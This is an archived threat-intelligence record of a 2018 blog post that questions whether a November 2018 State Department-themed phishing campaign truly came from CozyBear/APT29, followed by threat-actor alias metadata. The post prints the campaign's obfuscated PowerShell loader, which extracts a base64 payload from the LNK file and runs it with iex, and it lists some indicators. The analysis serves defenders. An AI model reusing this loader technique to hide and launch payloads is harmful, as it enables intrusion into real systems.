{ "id": "bb135356-b4ce-43e2-bef0-970aea2d67de", "created_at": "2026-04-06T00:10:46.923718Z", "updated_at": "2026-04-10T03:37:33.419531Z", "deleted_at": null, "sha1_hash": "03b44872d273ab9d1dc4e6dd8817b248c175f65c", "title": "CozyBear – In from the Cold?", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 77344, "plain_text": "CozyBear – In from the Cold?\r\nPublished: 2018-11-18 · Archived: 2026-04-05 18:31:00 UTC\r\nOn 15 November, something long-awaited (and presumably expected) came to pass in the information security\r\ncommunity – CozyBear/APT29/CozyDuke/”The Dukes”/”Office Monkeys” were (or seemed to be) back.\r\nSubsequent reporting defined the scope of the event: a large phishing campaign on 14 November targeting\r\nmultiple organizations spanning “military agencies, law enforcement, defense contractors, media companies and\r\npharmaceutical companies,” among other entities. The campaign itself offered a number of items that screamed\r\nattribution to CozyBear – reuse of PowerShell scripting techniques from past campaigns, leveraging PowerShell-laden LNK files for initial activity, and some possible overlap in infrastructure creation. Essentially, this was\r\nalmost too easy – which means, we (the cybersecurity community) should probably start asking questions.\r\nSkepticism crept in fairly early on for this event – and for good reason. Within information security and threat\r\nintelligence circles, CozyBear/APT29/Dukes/etc. is commonly perceived as the “senior partner” in Russian-linked\r\nthreats (excepting perhaps Turla). The combination of mass scale, little variation in phish/lures, and regurgitation\r\nof past tradecraft all present a curious and confounding issue: is this the same adversary, an attempt by some other\r\nentity to look like a historical adversary, or something else entirely?\r\nFrom a purely technical perspective, available evidence to this author at the time of writing indicates a very\r\nnarrow range of variation for attacker techniques. Phishing messages came from multiple domains but all from the\r\nsame mail server (mx1.era.citon\\.com, hosted at 216.251.161\\.198), leveraging the same theme of an\r\n“unclassified” message from the US Department of State, while using nearly identical links (as opposed to per-victim link structures to track click-throughs) for the malicious payload. Furthermore, payloads captured to date\r\nall feature identical naming schema – a LNK file (ds7002.lnk) dropping and launching via various PowerShell\r\nscripts a DLL (cyzfc.dat) to execute a variant of Cobalt Strike in memory – indicative of an almost commodity-like phishing expedition with little (if any) variation among victims. From an operational security and evasion\r\nstandpoint, this seems simply bonkers for an “advanced”, stealthy adversary. While the campaign in question\r\nleveraged a compromised mail server for delivery and compromised web server to deliver a second stage, this still\r\nmapped to fairly static delivery and payload items, while the 2016 event at least used at least five different\r\n“themes” or “waves” and multiple compromised websites (albeit all with “PDF” in their name) to differentiate and\r\nthrow off detection and response.\r\nExtending further, the intrusion event progresses to the delivery of a malicious LNK file embedded in a ZIP\r\narchive – again, reminiscent of the 2016 event with its downloaded ZIPs holding double-extension files like\r\n“37486-the-shocking-truth-about-election-rigging-in-america.rtf.lnk”. Except, the 2016 campaign at least featured\r\npassword-protected ZIP files (password contained within the message) along with Office-based Macro\r\ndownloaders and anti-virtualization checks. Meanwhile, the 2018 event’s anti-analysis largely hinges on file\r\nrenaming and several layers of obfuscation. As shown in the following code snippet, the primary defense\r\nmechanism for this intrusion is determining if the LNK file has been renamed (as one would expect for samples\r\ndownloaded from a commercial virus database), combined with some obfuscation to defeat static analysis:\r\nhttps://pylos.co/2018/11/18/cozybear-in-from-the-cold/\r\nPage 1 of 5\n\n$ptgt=0x0005e2be;$vcq=0x000623b6;$tb=\"ds7002.lnk\";\r\nif (-not(Test-Path $tb)){$oe=Get-ChildItem -Path\r\n$Env:temp -Filter $tb -Recurse;if (-not $oe)\r\n{exit}[IO.Directory]::SetCurrentDirectory\r\n($oe.DirectoryName);}$vzvi=New-Object IO.FileStream\r\n$tb,'Open','Read','ReadWrite';$oe=New-Object byte[]\r\n($vcq-$ptgt);$r=$vzvi.Seek($ptgt,\r\n[IO.SeekOrigin]::Begin);$r=$vzvi.Read\r\n($oe,0,$vcq-$ptgt);$oe=\r\n[Convert]::FromBase64CharArray($oe,0,$oe.Length);\r\n$zk=[Text.Encoding]::ASCII.GetString($oe);iex $zk;\r\nCompared to the multiple levels of evasion and anti-analysis deployed in the 2016 event attributed to\r\nCozyBear/APT29, this would appear to be somewhat of a regression. Of course, no “APT” or other entity ever\r\ngets “bonus points” for being more technically sophisticated or daring, but moving backwards – if only slightly –\r\ndoes seem quite strange.\r\nThis strangeness continues when it comes to network infrastructure. CozyBear malware/tool hosting and\r\ncommand and control (C2) activity includes a wide variety of techniques: from using legitimate services (such as\r\nTwitter and GitHub) to leveraging compromised, but legitimate, domains that fit the adversary’s desired naming\r\nschema. In most cases though, the entity has largely avoided the use of self-registered, attacker-owned\r\ninfrastructure following typical registration and hosting patterns – that pattern of activity belongs to\r\nFancyBear/APT28. It would be notable that the SSL/TLS certificate associated with the C2 domain for the recent\r\ncampaign (pandorasong\\.com) moves away from the certificate pattern previously observed in past FancyBear\r\noperations, but we can probably assume the group looked to change previous patterns following the\r\nThreatConnect report linked previously. In some respects, one could say this campaign blended aspects of Cozy\r\nand FancyBear for infrastructure purposes – which would seem to be indicative of a third party attempting to\r\nemulate the techniques of others (and confusing their bears).\r\nSo the question becomes – what now? Overall, from a purely behavior-based perspective, the activity observed\r\nmatches what CozyBear/APT29 looked like in one point in time:delivery and initial exploitation/installation all\r\nreflect items observed for the past two (or more) years, in various respects. Yet such a view assumes that\r\nCozyBear remained static in tactics, techniques, and procedures (TTPs) through this extended period of little (or\r\nno) observed activity – which seems unlikely, if not fanciful. Even assuming that the personas behind\r\nCozyBear/APT29 are lazy and merely desire to be “good enough” to achieve mission success, remaining\r\ncompletely static in terms of general TTPs for two years appears to be careless at best, and career suicide at worst.\r\nTo distill matters to a fairly basic level, we are left with two choices: either CozyBear has remained static in terms\r\nof TTPs and tradecraft for an extended period of time, or the recent activity represents another entity working to\r\nmimic CozyBear-like activity based on the last widely-observed campaigns attributed to this entity. One could\r\nalso argue for a third possibility: that this is an elaborate “double-fake” of CozyBear pulling off a brief campaign\r\nwith a poor version of the group’s old TTPs to make people think this is actually some other entity.\r\nLet’s start with the first possibility: Cozy just got kind of… cozy. Why bother innovating if the same old things\r\nstill work? For what it is worth, the methodology deployed is still rather effective: using a legitimate source for\r\nhttps://pylos.co/2018/11/18/cozybear-in-from-the-cold/\r\nPage 2 of 5\n\nphishing messages and hosting initial payloads on a compromised server avoids reputation issues on “new”\r\ninfrastructure. Traffic is all wrapped in HTTPS avoiding most network security monitoring (NSM) instances\r\nexcept limited metadata and those rare instances where organizations break SSL/TLS connections. The payload\r\nitself reasonably evaded detection – while VirusTotal engines are not necessarily the “latest and greatest” for\r\ncommercial AV detections, looking at both the LNK file (3 detections on 14 November, all fairly generic and none\r\nof the major vendors) and the DLL (4 detections on 14 November, interestingly enough mostly from machine\r\nlearning-based solutions) these “recycled” TTPs seem pretty effective. Accepting the assumption that no one gets\r\nbonus points for “style”, why wouldn’t CozyBear simply use legacy – but still effective – tradecraft instead of\r\nspending cycles and resources to develop (and then burn) new capabilities? Of course, this still leaves some other\r\noddities out there: the timing (awfully similar if not exact to the post US election campaign from 2016), the\r\nexpanded targeting (the entity has largely focused on political/military/government targets previously), and the\r\nmigration to a modified publicly-available post-exploitation framework. Essentially, there are enough data points\r\non either side of the argument to make coming to a definitive conclusion quite difficult.\r\nGiven this uncertainty, our second possibility is certainly within scope: TTPs (including code samples and other\r\nartifacts) from 2016 events are publicly available, along with the basis (Cobalt Strike framework) for post-exploitation activity. Unlike compiled binaries where source code is often lacking, any suitably skilled adversary\r\ncould capture and repurpose tradecraft and technical items from 2016 CozyBear events, modify them slightly, and\r\nreuse them in another campaign. The wide net cast by this campaign and lack of significant variation in phishing\r\nmessages and malicious links hint at something less sophisticated than past CozyBear behavior (and perhaps a\r\n“rushed” operation) while the relative ease in which the various payloads can be analyzed up to final post-exploitation stages (compared to the anti-virtualization and anti-analysis checks used in past activity) would\r\nseemingly indicate a similar but not-quite-the-same activity. But based on what was stated in the last paragraph,\r\nwhy does CozyBear (or any adversary) need to keep “pushing the envelope” and innovating if recycled versions\r\nof relatively old TTPs can still be effective? In other words, just because TTPs are recycled doesn’t mean this is\r\nanother entity repurposing CozyBear TTPs. While many might take the stand that analysts are obligated to prove\r\nthat the activity aligns to CozyBear, we must equally consider the requirement to prove that such activity aligns to\r\nanother, unknown entity – which is, in many respects, a very hard case to make given the increased uncertainty\r\n(just who would do this?) surrounding this possibility. Ultimately, the “false flag” narrative seems plausible, but is\r\nnot overwhelmingly likely given available information.\r\nSo what of our third possibility – the “three dimensional chess” situation where CozyBear acts like a facsimile of\r\nitself to lull others into thinking this is some sort of false flag operation when really this aligns to something more?\r\nSeveral tweets and private discussions indicate some justification for this, along with past observations of\r\nCozyBear activity using “noisy” events to hide more selective and targeted activity. This is certainly very\r\nplausible, and given the breadth of phishing activity and the response – much of the security community and\r\nrelevant press was very quick to react and devote significant resources to the event – this seems a potentially\r\npowerful misdirection tactic. Similar to an overzealous immune response, the reaction to “obvious” indicators of\r\nmalicious behavior associated with a high-profile adversary can easily be used to either mask other operations,\r\nlure responders to reallocate resources from one investigation (say, the “true” CozyBear target) to chasing the\r\npublic event of the moment, or some other scenario fitting within the concepts of military deception. Yet all of\r\nthese fail Occam’s razor in terms of simplicity and elegance – that doesn’t mean this theory is incorrect, but the\r\nburden of proof to make this case could be considered higher than other, more direct scenarios. So while this is an\r\nhttps://pylos.co/2018/11/18/cozybear-in-from-the-cold/\r\nPage 3 of 5\n\nextremely enticing theory, this also appears (in my opinion) to be the one where “making the case” (absent direct\r\nevidence from a victim environment) is most difficult.\r\nSo we have covered several possibilities for just where this activity may have originated – based on the evidence\r\nat hand, can we find one that appears stronger or more likely than the rest? Unfortunately for those seeking a\r\ndefinitive selection between the above choices, not only can I not make a definitive, evidence-based decision\r\nbetween the them, but an overview of available data and commentary indicates that no one else can either – or if\r\nthey can, they’re not telling anyone outside of a (very high) paywall. Quite simply: this campaign is worrying in\r\nscope, perceived intention, and potential attribution – but the oddity of TTP recycling and “shotgun” targeting for\r\na perceived “advanced” and skilled actor is not merely striking, but off-putting. Furthermore, we have recently\r\nobserved increased efforts by state-linked threats to mimic other state-linked threats. Based on the current threat\r\nlandscape, all of the above seem quite plausible, if not equally possible.\r\nFrom my perspective, we (network defenders and threat intelligence analysts) are left at a loss in the immediate\r\nterm without more evidence – up to and including the sort most often associated with spooky three-letter agencies\r\nin the greater Washington, DC area (although the Dutch are giving these entities a run for their money). Short of\r\nhaving a glimpse of who is actually “on keyboard” and similar such nuggets, piercing the fog surrounding this\r\nevent will be painful and time-consuming – and even then, dependent upon not a little bit of luck at finding just\r\nthe right pieces of evidence to make a solid technical case to support one of the above scenarios.\r\nThe next question for me then is: should we be concerned about faulty or incomplete attribution based on the\r\nconfusing aspects of this case from a defensive perspective? Well, if you have followed my past thoughts on the\r\npractice of threat intelligence and attribution, the answer for the vast majority of network defenders is: no. There\r\nare definitely exceptions to this – both in terms of organizations (governments and national security personnel\r\ncertainly want to know “who’s responsible?”) and sometimes defensive or response goals. Thus for some entities\r\nthere will be great value in going down the “rabbit hole” of attempting to determine with accuracy what entity is\r\nresponsible for the event in question – and it also just so happens that these entities typically have both the\r\nresources and information sources required to pursue this line of inquiry. But ultimately – this work will take time,\r\neffort, and resources, several (or all) of which most organizations (including those targeted in this event) simply\r\ndo not have in abundance.\r\nFor the rest of us, whether CozyBear or FancyBear or some sort of Panda or APTxx is responsible not only\r\ndoesn’t materially matter for immediate defensive needs, but it may even prove to be a critical distraction. Instead,\r\nwe can look at the fundamental behaviors exhibited in this campaign, and utilize these for an immediate response\r\nagainst initial intrusion activity. Separate from that… what else do we, as “on the ground”, front-line defenders,\r\nreally need to know? Irrespective of whether this is CozyBear or some other entity, the activity is without question\r\nmalicious. Whether a mass campaign by an adversary or a feint designed to distract from something else, the goals\r\nand requirements for conducting network defense and response remain the same: identify the target, determine\r\nscope of breach, and remediate to a known-good state within the defended network. We as a community can spend\r\nan inordinate amount of time discussing just how many angels can dance on the head of this pin when it comes to\r\nattribution – but at the end of the day, aside from a select few of us in very particular circumstances, it just doesn’t\r\nmatter.\r\nhttps://pylos.co/2018/11/18/cozybear-in-from-the-cold/\r\nPage 4 of 5\n\nSome of you will read this and view my conclusion as some sort of “cop out” from actually solving the perceived\r\nproblem of, “Is CozyBear back, and if so why?” Yet I actually find the position adopted here to be the more\r\ngruelling one to embrace and defend, because our inclination as human beings, with our penchant for retributive\r\njustice, cries out to identify, “WHO IS RESPONSIBLE?” Unfortunately, adopting a position that recognizes not\r\njust what matters in the  immediate sense of network defense operations but also the limitations of what it is we\r\ncan (definitively) know about the intent and authorship of such actions (barring mind-numbingly bad operational\r\nsecurity failures), such a desire will more often than not crash upon the rocks of uncertainty. Essentially – working\r\nwith imperfect knowledge, and possessing limited resources to address various gaps in such knowledge, what\r\nshould we, as information security professionals defending networks or clients, prioritize?\r\nI would stridently argue that identifying “who” is responsible and precisely “why” represent academic questions –\r\ninteresting and potentially valuable in limited circumstances, but sufficiently divorced from everyday\r\nrequirements as to make them superfluous and distracting. Rather, aside from ascertaining a broad sense of intent\r\n(Ransom? Theft? Disruption or destruction?), the goal of defenders (including those operating within the specialist\r\nfield of threat intelligence) is to identify the attack vector and its technical, provable implications, and then\r\ndetermine the means to defeat and roll-back the intrusion. This more limited approach takes into consideration not\r\nmerely what is immediately (and concretely) actionable, but also what is knowable given the information both at\r\nhand and that might be reasonably discovered.\r\nSo to circle back to the title of this post – is CozyBear “in” from the cold? Quite frankly: I don’t care. Someone is\r\ncertainly active and adopting TTPs reflecting past activity associated with CozyBear – which in many respects is\r\nan unalloyed “good thing” as we can easily identify and trace various aspects of the initial intrusion event. Beyond\r\nthis, it is imperative for defenders to continue monitoring this activity to determine just what the next stages of\r\naction are for this campaign and the implications of the post-exploitation technique adopted for the event. But\r\nbeyond these concrete, technical items, we enter into a morass of speculation, uncertainty, and (even when\r\nsufficient information is at hand) academic declaration so far divorced from the needs of information security as to\r\nmake an emphasis on “who” based discovery in this instance almost negligent in light of primary duties. Thus, my\r\ntake-away for this event, and all the attention it has received thus far, is to treat it seriously given it is a wide-ranging intrusion attempt deploying effective (if aged) methods for initial intrusion – and go no further.\r\nGovernments, researchers, and various other persons will spend many cycles trying to burrow into this event to\r\ndiscover its secrets – but while they do so, those devoted to monitoring, defending, and (when necessary)\r\nrecovering networks should focus on primary goals: defeating intrusions, no matter where they emanate from, or\r\nwho is responsible.\r\nSource: https://pylos.co/2018/11/18/cozybear-in-from-the-cold/\r\nhttps://pylos.co/2018/11/18/cozybear-in-from-the-cold/\r\nPage 5 of 5", "extraction_quality": 1, "language": "EN", "sources": [ "MISPGALAXY", "Malpedia" ], "references": [ "https://pylos.co/2018/11/18/cozybear-in-from-the-cold/" ], "report_names": [ "cozybear-in-from-the-cold" ], "threat_actors": [ { "id": "8aaa5515-92dd-448d-bb20-3a253f4f8854", "created_at": "2024-06-19T02:03:08.147099Z", "updated_at": "2026-04-10T02:00:03.685355Z", "deleted_at": null, "main_name": "IRON HUNTER", "aliases": [ "ATK13 ", "Belugasturgeon ", "Blue Python ", "CTG-8875 ", "ITG12 ", "KRYPTON ", "MAKERSMARK ", "Pensive Ursa ", "Secret Blizzard ", "Turla", "UAC-0003 ", "UAC-0024 ", "UNC4210 ", "Venomous Bear ", "Waterbug " ], "source_name": "Secureworks:IRON HUNTER", "tools": [ "Carbon-DLL", "ComRAT", "LightNeuron", "Mosquito", "PyFlash", "Skipper", "Snake", "Tavdig" ], "source_id": "Secureworks", "reports": null }, { "id": "dfee8b2e-d6b9-4143-a0d9-ca39396dd3bf", "created_at": "2022-10-25T16:07:24.467088Z", "updated_at": "2026-04-10T02:00:05.000485Z", "deleted_at": null, "main_name": "Circles", "aliases": [], "source_name": "ETDA:Circles", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "5b748f86-ac32-4715-be9f-6cf25ae48a4e", "created_at": "2024-06-04T02:03:07.956135Z", "updated_at": "2026-04-10T02:00:03.689959Z", "deleted_at": null, "main_name": "IRON HEMLOCK", "aliases": [ "APT29 ", "ATK7 ", "Blue Kitsune ", "Cozy Bear ", "The Dukes", "UNC2452 ", "YTTRIUM " ], "source_name": "Secureworks:IRON HEMLOCK", "tools": [ "CosmicDuke", "CozyCar", "CozyDuke", "DiefenDuke", "FatDuke", "HAMMERTOSS", "LiteDuke", "MiniDuke", "OnionDuke", "PolyglotDuke", "RegDuke", "RegDuke Loader", "SeaDuke", "Sliver" ], "source_id": "Secureworks", "reports": null }, { "id": "a241a1ca-2bc9-450b-a07b-aae747ee2710", "created_at": "2024-06-19T02:03:08.150052Z", "updated_at": "2026-04-10T02:00:03.737173Z", "deleted_at": null, "main_name": "IRON RITUAL", "aliases": [ "APT29", "Blue Dev 5 ", "BlueBravo ", "Cloaked Ursa ", "CozyLarch ", "Dark Halo ", "Midnight Blizzard ", "NOBELIUM ", "StellarParticle ", "UNC2452 " ], "source_name": "Secureworks:IRON RITUAL", "tools": [ "Brute Ratel C4", "Cobalt Strike", "EnvyScout", "GoldFinder", "GoldMax", "NativeZone", "RAINDROP", "SUNBURST", "Sibot", "TEARDROP", "VaporRage" ], "source_id": "Secureworks", "reports": null }, { "id": "a97cf06d-c2e2-4771-99a2-c9dee0d6a0ac", "created_at": "2022-10-25T16:07:24.349252Z", "updated_at": "2026-04-10T02:00:04.949821Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "ATK 13", "Belugasturgeon", "Blue Python", "CTG-8875", "G0010", "Group 88", "ITG12", "Iron Hunter", "Krypton", "Makersmark", "Operation Epic Turla", "Operation Moonlight Maze", "Operation Penguin Turla", "Operation Satellite Turla", "Operation Skipper Turla", "Operation Turla Mosquito", "Operation WITCHCOVEN", "Pacifier APT", "Pensive Ursa", "Popeye", "SIG15", "SIG2", "SIG23", "Secret Blizzard", "TAG-0530", "Turla", "UNC4210", "Venomous Bear", "Waterbug" ], "source_name": "ETDA:Turla", "tools": [ "ASPXSpy", "ASPXTool", "ATI-Agent", "AdobeARM", "Agent.BTZ", "Agent.DNE", "ApolloShadow", "BigBoss", "COMpfun", "Chinch", "Cloud Duke", "CloudDuke", "CloudLook", "Cobra Carbon System", "ComRAT", "DoublePulsar", "EmPyre", "EmpireProject", "Epic Turla", "EternalBlue", "EternalRomance", "GoldenSky", "Group Policy Results Tool", "HTML5 Encoding", "HyperStack", "IcedCoffee", "IronNetInjector", "KSL0T", "Kapushka", "Kazuar", "KopiLuwak", "Kotel", "LOLBAS", "LOLBins", "LightNeuron", "Living off the Land", "Maintools.js", "Metasploit", "Meterpreter", "MiamiBeach", "Mimikatz", "MiniDionis", "Minit", "NBTscan", "NETTRANS", "NETVulture", "Neptun", "NetFlash", "NewPass", "Outlook Backdoor", "Penquin Turla", "Pfinet", "PowerShell Empire", "PowerShellRunner", "PowerShellRunner-based RPC backdoor", "PowerStallion", "PsExec", "PyFlash", "QUIETCANARY", "Reductor RAT", "RocketMan", "SMBTouch", "SScan", "Satellite Turla", "SilentMoon", "Sun rootkit", "TTNG", "TadjMakhal", "Tavdig", "TinyTurla", "TinyTurla Next Generation", "TinyTurla-NG", "Topinambour", "Tunnus", "Turla", "Turla SilentMoon", "TurlaChopper", "Uroburos", "Urouros", "WCE", "WITCHCOVEN", "WhiteAtlas", "WhiteBear", "Windows Credential Editor", "Windows Credentials Editor", "Wipbot", "WorldCupSec", "XTRANS", "certutil", "certutil.exe", "gpresult", "nbtscan", "nbtstat", "pwdump" ], "source_id": "ETDA", "reports": null }, { "id": "46b3c0fc-fa0c-4d63-a38a-b33a524561fb", "created_at": "2023-01-06T13:46:38.393409Z", "updated_at": "2026-04-10T02:00:02.955738Z", "deleted_at": null, "main_name": "APT29", "aliases": [ "Cloaked Ursa", "TA421", "Blue Kitsune", "BlueBravo", "IRON HEMLOCK", "G0016", "Nobelium", "Group 100", "YTTRIUM", "Grizzly Steppe", "ATK7", "ITG11", "COZY BEAR", "The Dukes", "Minidionis", "UAC-0029", "SeaDuke" ], "source_name": "MISPGALAXY:APT29", "tools": [ "SNOWYAMBER", "HALFRIG", "QUARTERRIG" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "a97fee0d-af4b-4661-ae17-858925438fc4", "created_at": "2023-01-06T13:46:38.396415Z", "updated_at": "2026-04-10T02:00:02.957137Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "TAG_0530", "Pacifier APT", "Blue Python", "UNC4210", "UAC-0003", "VENOMOUS Bear", "Waterbug", "Pfinet", "KRYPTON", "Popeye", "SIG23", "ATK13", "ITG12", "Group 88", "Uroburos", "Hippo Team", "IRON HUNTER", "MAKERSMARK", "Secret Blizzard", "UAC-0144", "UAC-0024", "G0010" ], "source_name": "MISPGALAXY:Turla", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "d11c89bb-1640-45fa-8322-6f4e4053d7f3", "created_at": "2022-10-25T15:50:23.509601Z", "updated_at": "2026-04-10T02:00:05.277674Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "Turla", "IRON HUNTER", "Group 88", "Waterbug", "WhiteBear", "Krypton", "Venomous Bear", "Secret Blizzard", "BELUGASTURGEON" ], "source_name": "MITRE:Turla", "tools": [ "PsExec", "nbtstat", "ComRAT", "netstat", "certutil", "KOPILUWAK", "IronNetInjector", "LunarWeb", "Arp", "Uroburos", "PowerStallion", "Kazuar", "Systeminfo", "LightNeuron", "Mimikatz", "Tasklist", "LunarMail", "HyperStack", "NBTscan", "TinyTurla", "Penquin", "LunarLoader" ], "source_id": "MITRE", "reports": null }, { "id": "730dfa6e-572d-473c-9267-ea1597d1a42b", "created_at": "2023-01-06T13:46:38.389985Z", "updated_at": "2026-04-10T02:00:02.954105Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "Pawn Storm", "ATK5", "Fighting Ursa", "Blue Athena", "TA422", "T-APT-12", "APT-C-20", "UAC-0001", "IRON TWILIGHT", "SIG40", "UAC-0028", "Sofacy", "BlueDelta", "Fancy Bear", "GruesomeLarch", "Group 74", "ITG05", "FROZENLAKE", "Forest Blizzard", "FANCY BEAR", "Sednit", "SNAKEMACKEREL", "Tsar Team", "TG-4127", "STRONTIUM", "Grizzly Steppe", "G0007" ], "source_name": "MISPGALAXY:APT28", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e3767160-695d-4360-8b2e-d5274db3f7cd", "created_at": "2022-10-25T16:47:55.914348Z", "updated_at": "2026-04-10T02:00:03.610018Z", "deleted_at": null, "main_name": "IRON TWILIGHT", "aliases": [ "APT28 ", "ATK5 ", "Blue Athena ", "BlueDelta ", "FROZENLAKE ", "Fancy Bear ", "Fighting Ursa ", "Forest Blizzard ", "GRAPHITE ", "Group 74 ", "PawnStorm ", "STRONTIUM ", "Sednit ", "Snakemackerel ", "Sofacy ", "TA422 ", "TG-4127 ", "Tsar Team ", "UAC-0001 " ], "source_name": "Secureworks:IRON TWILIGHT", "tools": [ "Downdelph", "EVILTOSS", "SEDUPLOADER", "SHARPFRONT" ], "source_id": "Secureworks", "reports": null }, { "id": "ae320ed7-9a63-42ed-944b-44ada7313495", "created_at": "2022-10-25T15:50:23.671663Z", "updated_at": "2026-04-10T02:00:05.283292Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "APT28", "IRON TWILIGHT", "SNAKEMACKEREL", "Group 74", "Sednit", "Sofacy", "Pawn Storm", "Fancy Bear", "STRONTIUM", "Tsar Team", "Threat Group-4127", "TG-4127", "Forest Blizzard", "FROZENLAKE", "GruesomeLarch" ], "source_name": "MITRE:APT28", "tools": [ "Wevtutil", "certutil", "Forfiles", "DealersChoice", "Mimikatz", "ADVSTORESHELL", "Komplex", "HIDEDRV", "JHUHUGIT", "Koadic", "Winexe", "cipher.exe", "XTunnel", "Drovorub", "CORESHELL", "OLDBAIT", "Downdelph", "XAgentOSX", "USBStealer", "Zebrocy", "reGeorg", "Fysbis", "LoJax" ], "source_id": "MITRE", "reports": null }, { "id": "20d3a08a-3b97-4b2f-90b8-92a89089a57a", "created_at": "2022-10-25T15:50:23.548494Z", "updated_at": "2026-04-10T02:00:05.292748Z", "deleted_at": null, "main_name": "APT29", "aliases": [ "APT29", "IRON RITUAL", "IRON HEMLOCK", "NobleBaron", "Dark Halo", "NOBELIUM", "UNC2452", "YTTRIUM", "The Dukes", "Cozy Bear", "CozyDuke", "SolarStorm", "Blue Kitsune", "UNC3524", "Midnight Blizzard" ], "source_name": "MITRE:APT29", "tools": [ "PinchDuke", "ROADTools", "WellMail", "CozyCar", "Mimikatz", "Tasklist", "OnionDuke", "FatDuke", "POSHSPY", "EnvyScout", "SoreFang", "GeminiDuke", "reGeorg", "GoldMax", "FoggyWeb", "SDelete", "PolyglotDuke", "AADInternals", "MiniDuke", "SeaDuke", "Sibot", "RegDuke", "CloudDuke", "GoldFinder", "AdFind", "PsExec", "NativeZone", "Systeminfo", "ipconfig", "Impacket", "Cobalt Strike", "PowerDuke", "QUIETEXIT", "HAMMERTOSS", "BoomBox", "CosmicDuke", "WellMess", "VaporRage", "LiteDuke" ], "source_id": "MITRE", "reports": null }, { "id": "f27790ff-4ee0-40a5-9c84-2b523a9d3270", "created_at": "2022-10-25T16:07:23.341684Z", "updated_at": "2026-04-10T02:00:04.549917Z", "deleted_at": null, "main_name": "APT 29", "aliases": [ "APT 29", "ATK 7", "Blue Dev 5", "BlueBravo", "Cloaked Ursa", "CloudLook", "Cozy Bear", "Dark Halo", "Earth Koshchei", "G0016", "Grizzly Steppe", "Group 100", "ITG11", "Iron Hemlock", "Iron Ritual", "Midnight Blizzard", "Minidionis", "Nobelium", "NobleBaron", "Operation Ghost", "Operation Office monkeys", "Operation StellarParticle", "SilverFish", "Solar Phoenix", "SolarStorm", "StellarParticle", "TEMP.Monkeys", "The Dukes", "UNC2452", "UNC3524", "Yttrium" ], "source_name": "ETDA:APT 29", "tools": [ "7-Zip", "ATI-Agent", "AdFind", "Agentemis", "AtNow", "BEATDROP", "BotgenStudios", "CEELOADER", "Cloud Duke", "CloudDuke", "CloudLook", "Cobalt Strike", "CobaltStrike", "CosmicDuke", "Cozer", "CozyBear", "CozyCar", "CozyDuke", "Danfuan", "EnvyScout", "EuroAPT", "FatDuke", "FoggyWeb", "GeminiDuke", "Geppei", "GoldFinder", "GoldMax", "GraphDrop", "GraphicalNeutrino", "GraphicalProton", "HAMMERTOSS", "HammerDuke", "LOLBAS", "LOLBins", "LiteDuke", "Living off the Land", "MagicWeb", "Mimikatz", "MiniDionis", "MiniDuke", "NemesisGemina", "NetDuke", "OnionDuke", "POSHSPY", "PinchDuke", "PolyglotDuke", "PowerDuke", "QUIETEXIT", "ROOTSAW", "RegDuke", "Rubeus", "SNOWYAMBER", "SPICYBEAT", "SUNSHUTTLE", "SeaDaddy", "SeaDask", "SeaDesk", "SeaDuke", "Sharp-SMBExec", "SharpView", "Sibot", "Solorigate", "SoreFang", "TinyBaron", "WINELOADER", "WellMail", "WellMess", "cobeacon", "elf.wellmess", "reGeorg", "tDiscoverer" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434246, "ts_updated_at": 1775792253, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/03b44872d273ab9d1dc4e6dd8817b248c175f65c.pdf", "text": "https://archive.orkl.eu/03b44872d273ab9d1dc4e6dd8817b248c175f65c.txt", "img": "https://archive.orkl.eu/03b44872d273ab9d1dc4e6dd8817b248c175f65c.jpg" } }